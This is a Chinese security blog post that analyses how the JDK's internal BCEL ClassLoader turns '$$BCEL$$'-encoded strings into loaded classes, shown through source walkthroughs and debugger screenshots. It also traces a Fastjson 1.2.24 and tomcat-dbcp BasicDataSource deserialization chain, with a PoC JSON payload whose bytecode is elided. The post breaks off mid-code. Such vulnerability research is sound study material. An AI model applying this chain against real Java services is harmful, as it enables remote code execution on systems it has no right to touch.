<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="desktop" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>BCEL的简单学习 | F4miti0n&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="BCEL介绍BCEL（Byte Code Engineering Library）是一个用于分析、修改和创建Java字节码的开源库。它提供了一组强大的工具和API，可用于动态修改和生成Java类文件。BCEL的主要功能包括以下几个方面：  字节码分析：BCEL可以加载和解析现有的Java类文件，提供了访问类、方法、字段和指令等各种元素的接口。通过这些接口，开发人员可以深入研究类的内部结构和操作指令">
<meta property="og:type" content="article">
<meta property="og:title" content="BCEL的简单学习">
<meta property="og:url" content="http://example.com/2023/09/12/BCEL%20ClassLoader/index.html">
<meta property="og:site_name" content="F4miti0n&#39;s Blog">
<meta property="og:description" content="BCEL介绍BCEL（Byte Code Engineering Library）是一个用于分析、修改和创建Java字节码的开源库。它提供了一组强大的工具和API，可用于动态修改和生成Java类文件。BCEL的主要功能包括以下几个方面：  字节码分析：BCEL可以加载和解析现有的Java类文件，提供了访问类、方法、字段和指令等各种元素的接口。通过这些接口，开发人员可以深入研究类的内部结构和操作指令">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/cover10.jpg">
<meta property="article:published_time" content="2023-09-12T11:50:08.000Z">
<meta property="article:modified_time" content="2023-09-11T17:08:35.087Z">
<meta property="article:author" content="F4miti0n">
<meta property="article:tag" content="Java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/cover10.jpg">
  
    <link rel="alternate" href="/atom.xml" title="F4miti0n's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>F4miti0n's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <img src="/images/avatar.png" alt="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">F4miti0n </div>
      <div class="dot"></div>
      <div class="subtitle">每天都在对抗无趣的生活 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E5%A4%8D%E7%8E%B0/" rel="tag">CTF复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E6%80%BB%E7%BB%93/" rel="tag">CTF总结</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HackTheBox/" rel="tag">HackTheBox</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%89%E5%8D%93%E6%B8%97%E9%80%8F/" rel="tag">安卓渗透</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%97%B2%E8%B0%88/" rel="tag">闲谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          January 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">6 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/08 ">
          August 2023 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          July 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/05 ">
          May 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/04 ">
          April 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          March 2023 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/03/10/RASPDemo/">
            <div class="recent-link-text">
              从零开始的RASP学习
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/">
            <div class="recent-link-text">
              Weblogic漏洞分析(一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/">
            <div class="recent-link-text">
              Jackson漏洞分析 (一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/">
            <div class="recent-link-text">
              关于2023的年度总结
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
            <div class="recent-link-text">
              Mysql任意文件读取
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-BCEL ClassLoader" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
<div class="article-gallery">
  <div class="article-gallery-photos">
    
      <a class="article-gallery-img" rel="gallery_cmlka1zue0006nkwd383x2fbr">
        <img src="/images/cover10.jpg" itemprop="image">
      </a>
    
  </div>
</div>

   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        BCEL的简单学习
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2023-09-12T11:50:08.000Z" itemprop="datePublished">2023-09-12</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3.6k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h3 id="BCEL介绍"><a href="#BCEL介绍" class="headerlink" title="BCEL介绍"></a>BCEL介绍</h3><p>BCEL（Byte Code Engineering Library）是一个用于分析、修改和创建Java字节码的开源库。它提供了一组强大的工具和API，可用于动态修改和生成Java类文件。<br>BCEL的主要功能包括以下几个方面：</p>
<ol>
<li>字节码分析：BCEL可以加载和解析现有的Java类文件，提供了访问类、方法、字段和指令等各种元素的接口。通过这些接口，开发人员可以深入研究类的内部结构和操作指令，从而进行静态分析和检查。</li>
<li>字节码修改：BCEL允许开发人员直接修改已加载的类文件的字节码。可以添加、删除或修改类、方法和字段，并重新保存修改后的文件。这使得BCEL成为处理字节码的有力工具，广泛应用于AOP（面向切面编程）等领域。</li>
<li>字节码生成：BCEL还提供了一组API，用于动态生成新的Java类文件。开发人员可以使用BCEL创建类、方法、字段和操作指令，然后将其编译成有效的字节码文件。这对于编写动态代理、字节码增强等需要在运行时生成类的场景非常有用。</li>
<li>反序列化和代码执行：BCEL在测试反序列化漏洞和执行动态生成的代码时非常有用。它可以帮助分析和处理序列化的对象，并提供了执行相关操作的接口。这在一些场景下，如利用漏洞进行远程代码执行时，是非常实用的工具。</li>
</ol>
<p>总之，BCEL是一个功能强大的Java字节码工程库，用于分析、修改和创建Java类文件。它具有广泛的应用领域，包括静态分析、字节码增强、动态代理、反序列化测试等。</p>
<h3 id="BCEL源码浅析"><a href="#BCEL源码浅析" class="headerlink" title="BCEL源码浅析"></a>BCEL源码浅析</h3><p>jdk的版本这里用的是神奇的jdk8u66，在jdk&lt;8u251的情况下，我们都能在<code>com.sun.org.apache.bcel.internal.util</code>里面找到<code>ClassLoader</code></p>
<p><code>BCELDemo</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">BCELDemo</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;    </span><br><span class="line">        <span class="type">JavaClass</span> <span class="variable">cls</span> <span class="operator">=</span> Repository.lookupClass(calc.class);  </span><br><span class="line">        <span class="type">String</span> <span class="variable">code</span> <span class="operator">=</span> Utility.encode(cls.getBytes(), <span class="literal">true</span>);  </span><br><span class="line">        System.out.println(code);  </span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ClassLoader</span>().loadClass(<span class="string">&quot;$$BCEL$$&quot;</span> + code).newInstance();  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析点是<code>loadClass()</code>这里的，由于双亲委派机制的原因，这里就不一步一步跟了</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907114517.png"></p>
<p>直接来到<code>com.sun.org.apache.bcel.internal.util.ClassLoader#loadClass()</code>这里，这里<code>cl</code>对象显然就是我们的关注重点，盘一下代码逻辑，能够看到先会根据所传入的<code>class_name</code>尝试从已有的<code>classes</code>中加载中该类，如果<code>classes</code>的确存在该类,则直接跳过返回<code>cl</code>对象，如果<code>classes</code>中不存在该类，则再通过<code>class_name</code>判定将加载的类是否是系统内部类，如果确实为系统内部类，则调用自带的类加载器进行加载，如果不为系统内部类，则继续往下进行。因为我们这里加载的类是我们自定义的恶意类，所以我们还得接着跟进一下。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907114906.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907115724.png"></p>
<p>最终是来到了<code>createClass()</code>这里，我们跟进去分析一下</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907115948.png"></p>
<p>代码逻辑非常简单，就是把传入的<code>classname</code>的前八个字符给砍了，再把剩下的字符decode成正常的字节码bytes数组(decode方法参数uncompress用来标识是否为zip流，当为true时走zip流解码)，在用之后生成的类解析器对bytes数组进行解析，得到一个崭新的<code>JavaClass</code>对象。具体的解析流程和解码流程这里不在深究，让我们出栈回到<code>loadClasses()</code>里面继续分析。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907120239.png"></p>
<p>之后就是调用Java原生的<code>defineClass()</code>进行类加载，这里的clazz经过调试已经变成了我们设置的恶意类，到此基本BCEL的类加载流程就趋向结尾了，此后就是<code>newInstance()</code>进行静态加载的事儿了。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230907121850.png"></p>
<h3 id="简单利用姿势"><a href="#简单利用姿势" class="headerlink" title="简单利用姿势"></a>简单利用姿势</h3><h4 id="Fastjson与BCEL"><a href="#Fastjson与BCEL" class="headerlink" title="Fastjson与BCEL"></a>Fastjson与BCEL</h4><h5 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h5><p><code>pom.xml</code></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.alibaba<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>fastjson<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.2.24<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--fastjson&lt;=1.2.36--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.tomcat<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>tomcat-dbcp<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">version</span>&gt;</span>9.0.20<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><code>poc</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">        <span class="string">&quot;@type&quot;</span>: <span class="string">&quot;org.apache.tomcat.dbcp.dbcp2.BasicDataSource&quot;</span>,</span><br><span class="line">        <span class="string">&quot;driverClassLoader&quot;</span>: &#123;</span><br><span class="line">            <span class="string">&quot;@type&quot;</span>: <span class="string">&quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span></span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="string">&quot;driverClassName&quot;</span>: <span class="string">&quot;$$BCEL$$$l$8b......&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="流程分析"><a href="#流程分析" class="headerlink" title="流程分析"></a>流程分析</h5><p>sink 在这一句代码上，最终是定位到了<code>org.apache.tomcat.dbcp.dbcp2.DriverFactory#createDriver()</code>执行的关键位置如图中断点所示，说句实话，这个sink点有些过于完美了，<code>driverClassName</code>和<code>driverClassLoader</code> 都由我们所传参数所决定。继续对<code>createDriver()</code>做一下回溯。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> <span class="title class_">ClassLoader</span>().loadClass(<span class="string">&quot;$$BCEL$$&quot;</span> + code).newInstance();  </span><br></pre></td></tr></table></figure>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908151847.png"><br>查找用法之后发现只有<code>org.apache.tomcat.dbcp.dbcp2.BasicDataSource#createConnectionFactory()</code> 这一个地方调用了它，对<code>createConnectionFactory()</code>再回溯一下。<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908152413.png"></p>
<p><code>org.apache.tomcat.dbcp.dbcp2.BasicDataSource#createDataSource()</code>下找到调用点，接着再往前回溯。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908153155.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908153245.png"></p>
<p>随便查找一下用法就掉宝了，直接出来两个getter方法。<del>根据Fastjson调用任意getter方法的特点，到这一步就可以与Fastjson链衔接形成闭环了</del>。但是因为这两个方法的返回值类型并不满足Fastjson的调用条件（具体条件可以看<code>Fastjson初探</code>那篇文章），所以并不能简单地认为该链子就到此结束了。在这里，我们可以引入一个Fastjson的小trick来解决这个问题。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908154221.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908154508.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908154532.png"></p>
<p>先抛开以上链子不谈，咱们重新复习一下<code>JSON.parse()</code>和<code>JSON.parseObject()</code>的区别（最常见的单参版本）。不难看出<code>parseObject()</code>的底层实现，本质是对<code>parse()</code>进行了一个简单的封装，将最终的解析对象统一转换为 <code>JSONObject</code>类型 。而转换的过程是涉及到了一个<code>JSON.toJSON</code>的神奇方法，我们可以跟进去看一看。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908175812.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230908180158.png"></p>
<p>这里是连同重载，把两处方法都给记录了下来</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">toJSON</span><span class="params">(Object javaObject)</span> &#123;  </span><br><span class="line">    <span class="keyword">return</span> toJSON(javaObject, SerializeConfig.globalInstance);  </span><br><span class="line">&#125;</span><br><span class="line">---------------------------------------------------------------------</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">toJSON</span><span class="params">(Object javaObject, SerializeConfig config)</span> &#123;  </span><br><span class="line">    <span class="keyword">if</span> (javaObject == <span class="literal">null</span>) &#123;  </span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">if</span> (javaObject <span class="keyword">instanceof</span> JSON) &#123;  </span><br><span class="line">        <span class="keyword">return</span> javaObject;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">if</span> (javaObject <span class="keyword">instanceof</span> Map) &#123;  </span><br><span class="line">        Map&lt;Object, Object&gt; map = (Map&lt;Object, Object&gt;) javaObject;  </span><br><span class="line">        <span class="type">JSONObject</span> <span class="variable">json</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JSONObject</span>(map.size());  </span><br><span class="line">        <span class="keyword">for</span> (Map.Entry&lt;Object, Object&gt; entry : map.entrySet()) &#123;  </span><br><span class="line">            <span class="type">Object</span> <span class="variable">key</span> <span class="operator">=</span> entry.getKey();  </span><br><span class="line">            <span class="type">String</span> <span class="variable">jsonKey</span> <span class="operator">=</span> TypeUtils.castToString(key);  </span><br><span class="line">            <span class="type">Object</span> <span class="variable">jsonValue</span> <span class="operator">=</span> toJSON(entry.getValue());  </span><br><span class="line">            json.put(jsonKey, jsonValue);  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">return</span> json;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">if</span> (javaObject <span class="keyword">instanceof</span> Collection) &#123;  </span><br><span class="line">        Collection&lt;Object&gt; collection = (Collection&lt;Object&gt;) javaObject;  </span><br><span class="line">        <span class="type">JSONArray</span> <span class="variable">array</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JSONArray</span>(collection.size());  </span><br><span class="line">        <span class="keyword">for</span> (Object item : collection) &#123;  </span><br><span class="line">            <span class="type">Object</span> <span class="variable">jsonValue</span> <span class="operator">=</span> toJSON(item);  </span><br><span class="line">            array.add(jsonValue);  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">return</span> array;  </span><br><span class="line">    &#125;  </span><br><span class="line">    Class&lt;?&gt; clazz = javaObject.getClass();  </span><br><span class="line">    <span class="keyword">if</span> (clazz.isEnum()) &#123;  </span><br><span class="line">        <span class="keyword">return</span> ((Enum&lt;?&gt;) javaObject).name();  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">if</span> (clazz.isArray()) &#123;  </span><br><span class="line">        <span class="type">int</span> <span class="variable">len</span> <span class="operator">=</span> Array.getLength(javaObject);  </span><br><span class="line">        <span class="type">JSONArray</span> <span class="variable">array</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JSONArray</span>(len);  </span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; len; ++i) &#123;  </span><br><span class="line">            <span class="type">Object</span> <span class="variable">item</span> <span class="operator">=</span> Array.get(javaObject, i);  </span><br><span class="line">            <span class="type">Object</span> <span class="variable">jsonValue</span> <span class="operator">=</span> toJSON(item);  </span><br><span class="line">            array.add(jsonValue);  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">return</span> array;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">if</span> (ParserConfig.isPrimitive(clazz)) &#123;  </span><br><span class="line">        <span class="keyword">return</span> javaObject;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="type">ObjectSerializer</span> <span class="variable">serializer</span> <span class="operator">=</span> config.getObjectWriter(clazz);  </span><br><span class="line">    <span class="keyword">if</span> (serializer <span class="keyword">instanceof</span> JavaBeanSerializer) &#123;  </span><br><span class="line">        <span class="type">JavaBeanSerializer</span> <span class="variable">javaBeanSerializer</span> <span class="operator">=</span> (JavaBeanSerializer) serializer;  </span><br><span class="line">        <span class="type">JSONObject</span> <span class="variable">json</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JSONObject</span>();  </span><br><span class="line">        <span class="keyword">try</span> &#123;  </span><br><span class="line">            Map&lt;String, Object&gt; values = javaBeanSerializer.getFieldValuesMap(javaObject);  </span><br><span class="line">            <span class="keyword">for</span> (Map.Entry&lt;String, Object&gt; entry : values.entrySet()) &#123;  </span><br><span class="line">                json.put(entry.getKey(), toJSON(entry.getValue()));  </span><br><span class="line">            &#125;  </span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;  </span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">JSONException</span>(<span class="string">&quot;toJSON error&quot;</span>, e);  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">return</span> json;  </span><br><span class="line">    &#125;       </span><br><span class="line">    <span class="type">String</span> <span class="variable">text</span> <span class="operator">=</span> JSON.toJSONString(javaObject);  </span><br><span class="line">    <span class="keyword">return</span> JSON.parse(text);  </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">--------------------------------------------------------------------------------</span><br></pre></td></tr></table></figure>

<p>就像我们之前在<code>Fastjson初探</code>里面提到过的那样，<code>toJSON()</code>会依据我们的javaObject的类型，进行相应的处理，如果javaObject是自定义的javaBean，那么则会在<code>javaBeanSerializer.getFieldValuesMap(javaObject)</code>这里通过反射进行属性值的获取，我们的任意getter执行，也是在这里实现的。而<code>parse()</code> 仅仅负责<code>setter</code>方法的执行与获取，但事实果真如此吗？我们这里要通过以下Demo重新认识一下<code>Fastjson</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Person</span>&#123;  </span><br><span class="line">    